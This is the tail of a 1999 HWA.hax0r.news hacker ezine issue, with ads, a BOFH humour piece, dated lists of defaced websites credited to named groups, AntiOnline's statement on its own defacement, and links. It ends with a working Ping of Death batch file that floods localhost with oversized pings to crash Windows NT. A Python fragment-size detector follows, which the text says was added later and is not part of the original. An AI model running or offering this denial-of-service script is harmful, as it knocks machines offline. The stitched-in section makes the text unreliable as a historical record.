                                HWA.hax0r.news  
     
     
     
     
     
AD.S ADVERTI$ING.           The HWA black market                    ADVERTISEMENT$.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      
       *****************************************************************************
       *                                                                           *
       *           ATTRITION.ORG     http://www.attrition.org                      *
       *           ATTRITION.ORG     Advisory Archive, Hacked Page Mirror          *
       *           ATTRITION.ORG     DoS Database, Crypto Archive                  *
       *           ATTRITION.ORG     Sarcasm, Rudeness, and More.                  * 
       *                                                                           *
       *****************************************************************************      
              
 
       www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
       n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
       m www.2600.com ########################################ww.2600.com www.freeke
       vin.com www.kev#  Support 2600.com and the Free Kevin #.com www.kevinmitnick.
       com www.2600.co#  defense fund site, visit it now! .  # www.2600.com www.free
       kevin.com www.k#             FREE KEVIN!              #in.com www.kevinmitnic
       k.com www.2600.########################################om www.2600.com www.fre
       ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
       k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre

       <a href="http://www.2600.com/">www.2600.com</a>
       <a href="http://www.kevinmitnick.com">www.kevinmitnick.com</a>
       
       
       +-----------------------------------------------------------------------------+
       | SmoG Alert ..           http://smog.cjb.net/        NEWS on SCIENCE         |
       | ===================     http://smog.cjb.net/        NEWS on SECURITY        |
       | NEWS/NEWS/NEWS/NEWS     http://smog.cjb.net/        NEWS on THE NET         |
       |                         http://smog.cjb.net/        NEWS on TECHNOLOGY      |
       +-----------------------------------------------------------------------------+
       
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
       *   www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net     *
    <a href="http://www.csoft.net">One of our sponsors, visit them now</a> www.csoft.net
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
       * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
       * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


         //////////////////////////////////////////////////////////////////////////////
        //  To place an ad in this section simply type it up and email it to        //
       //        hwa@press.usmc.net, put AD! in the subject header please. - Ed    //
      //////////////////////////////////////////////////////////////////////////////


     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      ~~~~~~~~~~~~~~~~~~~~~~~~~
                                                           Don't worry. worry a *lot*
     
      Send in submissions for this section please! .............    
     
     AntiOnline to Write Productive, Sense Making Article 
     Contributed by siko
     Tuesday - July 20, 1999. 04:24PM UTC 

          Early this afternoon, sources close to Innerpulse Media leaked information
      coming from the offices of AntiOnline.

      "He said he is going to write an article that doesn't piss all the fish in the pond
      off.", said the anonymous source. "I think he mentioned something about social
      engineering passwords."

      Speculation has grown throughout the day as to what could be posted on
      AntiOnline.com that actually makes sense and doesn't piss everyone off at the
      same time. 

      "Not everything on there lacks content or doesn't make a point. I really enjoyed
      reading about the Granny Hacker from Heck. And that story about the new
      Super Computer coming out was really great the third time around on
      AntiOnline.com. I just wasn't in the mood two weeks ago."

      AntiOnline.com 
      http://www.antionline.com/
     
      @HWA
      
     http://www.minet.net/blagues/bofh/
     
     The Bastard System Manager From Hell #1
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     I get into my office and it's my first day - I want to make a good impression, so I empty my IN 
     tray into the bin. Now that's what I call efficient!
     
     I get a call from the big boss - he's been getting complaints about the trainee bastard operator
     from hell. I ask him to forward all the complaints to me and that it would be best to let me deal
     with them. I ring the operator and get him to make an appointment with me.
     
     Two weeks later, he does, and I show him the complaints that have accumulated so far.
     
     "Seventy Three complaints in your first three weeks!" I shout "It's good - but it's NOT Good Enough!
     You should be getting at least 10 complaints a day - AT LEAST! Now, let's see what you're doing wrong:
     You get a call from a user - what do you do?"
     
     "Kill them off?" The TBOFH replies
     
     "NO! How can you kill them off if you don't know their USERNAME? Your FIRST priority is to get their 
     username. Then what would you do?"
     
     "Kill them off?"
     
     "NO! Get them to tell you what their problem is!"
     
     "Why?"
     
     "Because later I can say they didn't explain their problem to you properly! It's a great defence - 
     works every time. A user rings me up to complain; I listen to their problem, then say "OH, WHEN YOU 
     SAID `MY PC DOESN'T WORK' HE MUST HAVE THOUGHT YOU MEANT `HOW CAN I MAKE MY PC NEVER WORK AGAIN AND 
     DESTROY MY LIFE'S WORK AT THE SAME TIME?' - IT HAPPENS ALL THE TIME!' then they tell me how implausible
     that is, I say how terribly sorry we are, then fake some connect and CPU time records so their monthly 
     bill is about the same as the Uruguayan national debt...Understand? So, after you've heard their problem,
     what do you do?"
     
     "Kill them off?"
     
     "NO! Then you make up some excuse. Have you got an excuse card calendar?"
     
     "Uh. No.."
     
     "And you said you were qualified to operate a computer! You'd better have mine." I pass my computer card calendar over, flipping it to page one -
     "ENTROPY"....... ...I like it. "Now, you give the cretin an excuse then what do you do?"
     
     "Kill them off?"
     
     "YES!" (He certainly has a fixation) "Then what?"
     
     "Hang up?"
     
     "NO! Then they'll call you back when the problem recurs. Your job is to make them FEAR calling you. How can you work when people are calling? So, you make
     them pay for calling in the first place. What would you do?"
     
     "Delete their files?"
     
     "Yeah, it's a start, but then they may call back when they get new files. You want them NEVER to call back. What could you do?"
     
     "Swear at them?"
     
     "No. I can see we'll have to demonstrate. Have you got a metal ballpoint?"
     
     "Yes"
     
     "See that wallsocket over there. Take the refill out of the pen and poke it into the wallsocket."
     
     "But it's live!"
     
     "Would I really make you do it if it were live?"
     
     "Oh" >fiddle< >fiddle< >BZZZZZZZEEEEERT!< >THUD!<
     
     Of course I would. He was no good anyway. No killing instinct.
     
     
     @HWA
       
       
       
 SITE.1 Three sites this week
 
   
    #1  http://www.seifried.org/lasg/
        
        Linux Administrators Security Guide
        
        Available in PDF format, a must read for all Sysadmins.
        
        Not much to say about this site, it's not flashy, it's totally utilitarian and is the place
        from which you should get the LASG in its updated form or redirect to mirror sites. 
        
                                                             rated: no rating  - Ed
        
        Bored?
        
   #2   http://www.policescanner.com/
        
        This site will let you listen via realaudio to scanner output from various areas around the
        States, very interesting stuff even (or especially) for you out of towners, good for those
        boring weekend nights when scanner traffic is especially busy. Appeals to those that never
        miss an episode of COPS or are radio enthusiasts... rated: 7/10 - eentity
        
        
        Are you missing Packetstorm Security and really want to download some juarez?
                
   #3   http://secureroot.m4d.com/hackattack/files/
           
        try this site, they have a fairly decent archive of older philez, nice flashy site but not
        overly done, somewhat of a rootshell flavour....     rated: 7/10 - eentity
        
        
        
        
        
        
       
      @HWA
       
         
         
  H.W Hacked websites 
      ~~~~~~~~~~~~~~~~

      Note: The hacked site reports stay, especially with some cool hits by
            groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

          * Hackers Against Racist Propaganda (See issue #7)

     
      Haven't heard from Catharsys in a while for those following their saga visit
      http://frey.rapidnet.com/~ptah/ for 'the story so far'...
      
     
     
     Latest cracked pages courtesy of attrition.org
     
     
     
     [99.08.01]  [PulseWidth]            Run Your Own Business (www.runyourownbusiness.com)
     [99.08.01]  [PulseWidth]            Nellis AFB (www.nellis.af.mil)
     [99.08.01]  [ ]                     Nathan & Lewis Securities (www.nlfs.com)
     [99.08.01]  [HFD]                   Jerry Springer Show (www.jerryspringer.com)
     [99.08.01]  [AntiChrist]            Expat News (www.expat-news.com)
     [99.08.01]  [AntiChrist]            London Soft (www.londonsoft.com)
     [99.08.01]  [c0mrade]               Maktoob (www.maktoob.com)
     [99.08.01]  [AntiChrist]          K One Inch (www.oneinch.com)
     [99.08.01]  [AntiChrist]            Sandhan (www.sandhan.com)
     [99.08.01]  [AntiChrist]            Savmart (www.savmart.com)
     [99.08.01]  [AntiChrist]            Two 40 (www.two40.com)
     [99.08.01]  [AntiChrist]            Klassic Net (www.klassic.net)
     [99.08.01]  [AntiChrist]            Adworkz Net (www.adworkz.net)
     [99.08.01]  [AntiChrist]            Interstate Mortgage (www.interstatemortgage.net)
     [99.08.01]  [AntiChrist]            McMahon Group (www.mcmahongroup.net)
     [99.08.01]  [stonehenge crew]       One Online (IT) (www.oneonline.it)
     [99.08.01]  [gH]                    IDHL Gov (MY) (idhl.gov.my)
     [99.08.01]  [gH]                    Immigration Department of Malaysia (MY) (imigresen.imi.gov.my)
     [99.08.01]  [SOD]                   Instituto Geografico Agustin Codazzi (www.igac.gov.co)
     [99.08.01]  [keebler elves]         #3 KBS Gov (www.kbs.gov.my)
     [99.08.01]  [FL3M]              M   Ecom Malls (www.ecommalls.com)
     [99.08.01]  [ ]                     Software Tester (www.softwaretester.com)
     [99.08.01]  [ReMiX]                 X-Forces (www.x-forces.com)
     [99.08.01]  [ ]                  CK (cc) Minnesota (empire.lansing.cc.mi.us)
     
     

     [99.08.02]  [SQ]                    KuKluxKlan (www.kkklan.com)
     [99.08.02]  [red n black]           NHM (UK) (www.nhm.ac.uk)
     [99.08.02]  [LevelSeven]            #2 Peronda Net (www.peronda.net)
     [99.08.02]  [v00d00]              K Bears In The Barn (www.bearsinthebarn.com)
     [99.08.02]  [kastr0]                Complete Chaos (www.completechaos.com)
     [99.08.02]  [FOaM]                  Karbrella (www.karbrella.com)
     [99.08.02]  [FL3M]                K Career Concepts (www.careerconcepts.com)
     [99.08.02]  [KHG]                   Yugoslavia 8m (yugoslavia.8m.com)
     [99.08.02]  [AntiChrist]            Plague 99 (www.plague99.org)
     [99.08.02]  [AntiChrist]            Pleasant Valley UU Church (www.pvuuc.org)
     [99.08.02]  [AntiChrist]            Chinese Club (www.chineseclub.org)
     [99.08.02]  [AntiChrist]            Faith Walker (www.faithwalker.net)
     [99.08.02]  [AntiChrist]          K Starcraft Bunker (www.starcraftbunker.net)
     [99.08.02]  [AntiChrist]            Buy Fab (www.buyfab.com)
     [99.08.02]  [AntiChrist]            CCP Inc. (www.ccp-inc.com)
     [99.08.02]  [AntiChrist]            Click2site (www.edwincolon.click2site.com)
     [99.08.02]  [AntiChrist]            Fil India (www.filindia.com)
     [99.08.02]  [AntiChrist]            General Technologies (www.generaltechnologies.com)
     [99.08.02]  [AntiChrist]            Gentleman Dog (www.gentlemandog.com)
     [99.08.02]  [AntiChrist]            India PR (www.indiapr.com)
     [99.08.02]  [AntiChrist]            Joke Pizza (www.jokepizza.com)
     [99.08.02]  [AntiChrist]            Keywest Shrimphouse (www.keywestshrimphouse.com)
     [99.08.02]  [AntiChrist]            Trivandrum Fair2000 (www.trivandrum-fair2000.com)
     [99.08.02]  [AntiChrist]            Work Comp Online (www.workcomponline.com)
     [99.08.02]  [Offline]               Cairo Net (www.caironet.com)
     [99.08.02]  [bl0w team]             Symantec (www.symantec.com)
     [99.08.02]  [FL3M]                  Bennett Street (www.bennettstreet.com)
     [99.08.02]  [FL3M]                K Gamewood Net (www8.gamewood.net)
     
     
     
     Of note: AntiChrist calls it quits
              NYS returns (worthwhile reading)
              Several new defacers hit the scene
     
     
     [99.08.03]  [PulseWidth]            Amedd Army (akamai.tamc.amedd.army.mil)
     [99.08.03]  [AntiChrist]            Trivnet Club (www.trivnetclub.com)
     [99.08.03]  [NYS]                 K Acte Enterprises (FR) (www.acte-entreprises.fr)
     [99.08.03]  [ProdiByte]             Rosario Bus (AR) (www.rosariobus.com.ar)
     [99.08.03]  [Some Guy/Cat]          Home Amateur (www.homeamateur.com)
     [99.08.03]  [PulseWidth]          K Model Aircraft (www.modelaircraft.org)
     [99.08.03]  [PulseWidth]            Health Library @ McGill (CA) (www.health.library.mcgill.ca)
     [99.08.03]  [ProdiByte]             Bonobus (AR) (www.bonobus.com.ar)
     [99.08.03]  [KHG]                   Anti NATO (antinato.homepage.com)
     [99.08.03]  [KHG]                   Anti NATO Links (antinatolinks.homepage.com)
     [99.08.03]  [sciofide]            K Cyber Match Hawaii (mail.cybermatchhawaii.com)
     [99.08.03]  [KHG]                   Serbian Links (serbianlinks.homepage.com)
     [99.08.03]  [Tranzer]               Alerion (www.alerion.com)
     [99.08.03]  [PulseWidth]          K Buck (www.buck.com)
     [99.08.03]  [Saeid Yomtobian]       Lost Pussy (www.lostpussy.com)
     [99.08.03]  [HiP]                   #2 Mall LA (www.mall-la.com)
     [99.08.03]  [Tranzer]               UPN 35 (www.upn35.com)
     
     

     [99.08.04]  [PulseWidth]            DOF CA Gov (www.dof.ca.gov)
     [99.08.04]  [mozy]                  Pelican Org (AU) (www.pelican.org.au)
     [99.08.04]  [PulseWidth]            Cumberland (www.cumberland.org)
     [99.08.04]  [KHG]                   Serbia Online1 (serbiaonline1.cjb.net)
     [99.08.04]  [Cobra]                 Stop Nato2 (stopnato2.cjb.net)
     [99.08.04]  [Pakistan HC]           (net88) CAIS (net88.cais.com)
     [99.08.04]  [neeper]                Home Web (www.home-web.com)
     [99.08.04]  [keebler elves]         Teens Land (www.teensland.com)
     [99.08.04]  [mozy]                  WEVU TV (www.wevutv.com)

     

     [99.08.05]    [ ]                    AntiOnline Security Site (www.antionline.com)
     [99.08.05] So [kl0wn krew]           Abatelli (abatelli.com)
     [99.08.05] So [SQ]                   Energia GOB (MX) (atomo.energia.gob.mx)
     [99.08.05] So [ ]                    (code02) PBTech (code02.pbtech.net)
     [99.08.05] Li [holo]                 Tuo BME (HU) (minek.tuo.bme.hu)
     [99.08.05] Fb [doofoo]               Nailed (nailed.com)
     [99.08.05] NT [CUM]                  Adl Net (www.adlnet.org)
     [99.08.05] NT [CUM]                  #2 Alloweb (www.alloweb.com)
     [99.08.05] NT [CUM]                  Become Net (www.become.net)
     [99.08.05] NT [mozy]                 Amazone (www.amazone.com)
     [99.08.05] NT [ ]                    Comsoft (www.comsoft.com)
     [99.08.05] Sc [tvc]                  Web Banners (www.webbanners.com)
     
     
     
     [99.08.06] So [LevelSeven]           Poulan Weedeater (www.weedeater.com)
     [99.08.06] So [LevelSeven]           Tytan Industries (www.tytan.com)
     [99.08.06] NT [mozy]                 Stadskanaal (www.stadskanaal.nu)
     [99.08.06] NT [v00d00]               Meadowood Retirement Community (www.retiretoiu.com)
     [99.08.06] So [HiP]                  NorthStarNet (www.northstarnet.org)
     [99.08.06] So [LevelSeven]           Santa's Official Page (www.north-pole.net)
     [99.08.06] So [LevelSeven]           News Tips (www.newstips.com)
     [99.08.06] So [LevelSeven]           Multiverse (www.multiverse.com)
     [99.08.06] NT [Citadel]              Los Angeles City Site (www.la.com)
     [99.08.06] So [LevelSeven]           92.3 Cleveland's Jammin Oldies (www.jammin.com)
     [99.08.06] Ir [kl0wn krew]           Illinois Institute of Technology (www.iit.edu)
     [99.08.06] NT [Xessor]               Garth Brooks' Official site (www.garthbrooks.com)
     [99.08.06] So [LevelSeven]           Best Supply (www.bestsupply.com)
     
         

     Hacked: http://www.prowrestling.com
     By: gH
     Mirror: http://www.attrition.org/mirror/attrition/com/www.prowrestling.com/
     
         

     Hacked: http://www.idhl.gov.my (second time)
     By: Hi-Tech Hate
     Mirror: http://www.attrition.org/mirror/attrition/misc/www.idhl.gov.my-2 
         
          
     
      The following site appears to have been defaced. Mirror to come....


      HACKED(?): http://www.antionline.com/eye
      By: Unknown
      Exploit Used: Appears to be a redirect or meta-tag redirect.
      
      
      This has not been confirmed although we have witnessed this for ourselves.
      Details to follow.
      
      
      AntiOnline Hacked? 
      Thursday, August 5, 1999 at 13:43:28
      by John Vranesevich - Founder of AntiOnline 
 
      Following its policy about full site disclosure, AntiOnline offers the
      following statement:
 
      AntiOnline's newest feature, "Eye On The Underground", gathers data
      from several well known underground websites. The data is gathered
      dynamically once an hour via "AntiEye", one of our custom
      info-gathering applications.
 
      Today, one of the sites that we gather data from, Bikkel.com's message
      board, changed the format of their content to feed our website
      information other than that which was intended to be viewed from their
      actual webboard.
 
      Although this change in format in no way compromised the integrity of
      our servers, or the data contained therein, it did cause alternate
      information to be displayed on the "Eye On The Underground" section of
      our website to users who had specific versions of the Netscape and IE
      webbrowsers. We apologize to our users for the temporary disruption of
      this service.
 
      AntiOnline receives a hack attempt an average of once every 2 minutes,
      no one has ever successfully infiltrated any of our systems, or the data
      contained on them.
      
           
      and more sites at the attrition cracked web sites mirror:
                   
                    http://www.attrition.org/mirror/attrition/index.html 

       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       The links are no longer maintained in this file, there is now a
      links section on the http://welcome.to/HWA.hax0r.news/ url so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm


      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://bewoner.dma.be/cum/              
      
      Brasil........: http://www.psynet.net/ka0z              
            
                      http://www.elementais.cjb.net           
            
      Canada .......: http://www.hackcanada.com
      
      Colombia......: http://www.cascabel.8m.com              
      
                      http://www.intrusos.cjb.net             
      
      Indonesia.....: http://www.k-elektronik.org/index2.html 
      
                      http://members.xoom.com/neblonica/      
      
                      http://hackerlink.or.id/                
      
      Netherlands...: http://security.pine.nl/                
      
      Russia........: http://www.tsu.ru/~eugene/              
      
      Singapore.....: http://www.icepoint.com                 
                      
      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine.


    Got a link for this section? email it to hwa@press.usmc.net and i'll
    review it and post it here if it merits it.

    @HWA
    
     ** FREE TOY INSIDE! *** 
     
     This is an old and (should be) dead issue with Windows 95 boxen. The Ping Of Death (PoD) was
     quite rampant, and created havoc on irc and elsewhere in its day, you can test your box for
     PoD vulnerability by using the following batchfile. Note that results do not always occur
     immediately, but sometimes occur several minutes after the 'attack'.... included for the hell
     of it, I was bored, the file was just there so wtf? you know? kinda like trying an old exploit
     you KNOW is gonna be patched but wanna try it anyway? sometimes with newer versions of software
     old bugs are reintroduced so don't throw away all your old DoS programs or exploits, check your
     systems regularly.... - DrunkPhuX

     --cut--
     
     @echo off
     cls
     echo ------------------------------------------------------------------------------
     echo IMPORTANT INFO:
     echo.
     echo This Ping of Death works best if you try to surf the Internet
     echo at the same time.  Now I will try to start the web browser for
     echo you right now.  If it does not start, please start one right now.
     echo.
     echo More info at http://www.sophist.demon.co.uk/ping/
     echo Author of this batch file can be reached at [ag115@freenet.carleton.ca]
     echo.
     echo This crashes the author's NT 4.0 Service Pack 1 system reliably
     echo and one other system.  A third system didn't work, though.
     echo THIS SCRIPT PROBABLY DOES NOT CRASH SYSTEMS OTHER THAN THE ONE THIS RUNS ON!
     echo.
     echo Please flush your disk cache first to be on the safe side.
     echo This is done by hitting Ctrl-Alt-Delete once then hiting Esc to return.
     echo ------------------------------------------------------------------------------
     echo.
     echo Attempting to launch Web Browser, please wait...
     start /high http://www.microsoft.com/
     echo When a web browser is up, press any key to start Ping of Death on localhost.
     pause
     cls
     echo ------------------------------------------------------------------------------
     echo Now Initiating Ping of Death flood to localhost!
     echo ------------------------------------------------------------------------------
     echo.
     echo This may take a few minutes, especially if you only have 16 or 32 MB.
     echo Please wait until the prompt returns before you try to surf.
     echo Forking Ping of Death processes...
     REM Seems to work best with taskman loaded, for some weird reason.
     start /high /min taskmgr.exe
     for %%d in ( A B C D E F G H I J K L M N O P Q R ) do start /min ping -l 65527 -n 1000 localhost
     cls
     echo ------------------------------------------------------------------------------
     echo READY TO CRASH WITHIN THE HOUR!
     echo.
     echo Ping of Death in now in progress...Surf and Die - pun intended. ;-)
     echo You should see the blue screen with a STOP error soon.
     echo.
     echo You may surf now.  Remember, it may take 10 mins to crash. Or less. Or more.
     echo And not all NT 4.0 systems will crash with this script.
     echo You could try launching TaskMgr and a few small apps to expedite the crash.
     echo ------------------------------------------------------------------------------
         
     --cut--
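
The arithmetic behind the `ping -l 65527` line in the batch file above, seen from the receiving side, as an added example that is not part of the original issue or of the batch file author's code: a 65527-byte echo payload plus the 8-byte ICMP header and a 20-byte IP header reassembles to 65555 bytes, past the 65535 limit of the 16-bit Total Length field, and a filter or IDS can spot this from any single fragment's offset and length. The function names, the 1500-byte MTU and the sample headers are assumptions constructed for the illustration.

```python
import struct

MAX_IP_DATAGRAM = 65535   # largest value the 16-bit IPv4 Total Length field can hold
ICMP_ECHO_HEADER = 8      # type, code, checksum, identifier, sequence
IP_HEADER_MIN = 20        # IPv4 header without options


def echo_datagram_size(payload_len, ip_header_len=IP_HEADER_MIN):
    """Size of the whole IP datagram that carries an echo request."""
    return ip_header_len + ICMP_ECHO_HEADER + payload_len


def parse_fragment(header):
    """Decode the fields of an IPv4 header that matter for reassembly."""
    if len(header) < IP_HEADER_MIN:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, total_len, ident, flags_frag, _ttl, proto, _csum, src, _dst = \
        struct.unpack("!BBHHHBBH4s4s", header[:IP_HEADER_MIN])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < IP_HEADER_MIN or total_len < ihl:
        raise ValueError("not a well-formed IPv4 header")
    return {
        "ident": ident,
        "proto": proto,
        "src": ".".join(str(b) for b in src),
        "ihl": ihl,
        "offset": (flags_frag & 0x1FFF) * 8,   # field counts 8-byte units
        "more": bool(flags_frag & 0x2000),     # MF flag
        "data_len": total_len - ihl,
    }


def reassembled_size(header):
    """Smallest size the reassembled datagram must have, given this fragment."""
    f = parse_fragment(header)
    return f["ihl"] + f["offset"] + f["data_len"]


def scan(headers):
    """Return (ident, offset, size) for every fragment that implies an
    oversized datagram. A reassembler has to drop these, not copy them."""
    hits = []
    for h in headers:
        size = reassembled_size(h)
        if size > MAX_IP_DATAGRAM:
            f = parse_fragment(h)
            hits.append((f["ident"], f["offset"], size))
    return hits


def sample_fragments(payload_len, mtu=1500, ident=0x1234):
    """Constructed sample input: the IPv4 headers (headers only, checksum left
    at zero) of an echo request of the given payload size split for the MTU."""
    icmp_len = ICMP_ECHO_HEADER + payload_len
    step = (mtu - IP_HEADER_MIN) & ~7          # fragment data is a multiple of 8
    addr = bytes([127, 0, 0, 1])               # localhost, as in the batch file
    headers = []
    offset = 0
    while offset < icmp_len:
        data_len = min(step, icmp_len - offset)
        more = offset + data_len < icmp_len
        flags_frag = (0x2000 if more else 0) | (offset // 8)
        headers.append(struct.pack("!BBHHHBBH4s4s", 0x45, 0,
                                   IP_HEADER_MIN + data_len, ident, flags_frag,
                                   128, 1, 0, addr, addr))
        offset += data_len
    return headers


if __name__ == "__main__":
    print("datagram size for -l 65527:", echo_datagram_size(65527))
    for ident, offset, size in scan(sample_fragments(65527)):
        print("oversized: id=0x%04x offset=%d implies %d bytes" % (ident, offset, size))
```

Only the last of the 45 fragments trips the check, which is why the bounds test belongs in the reassembly path itself and not only on the first packet of a flow.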


  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]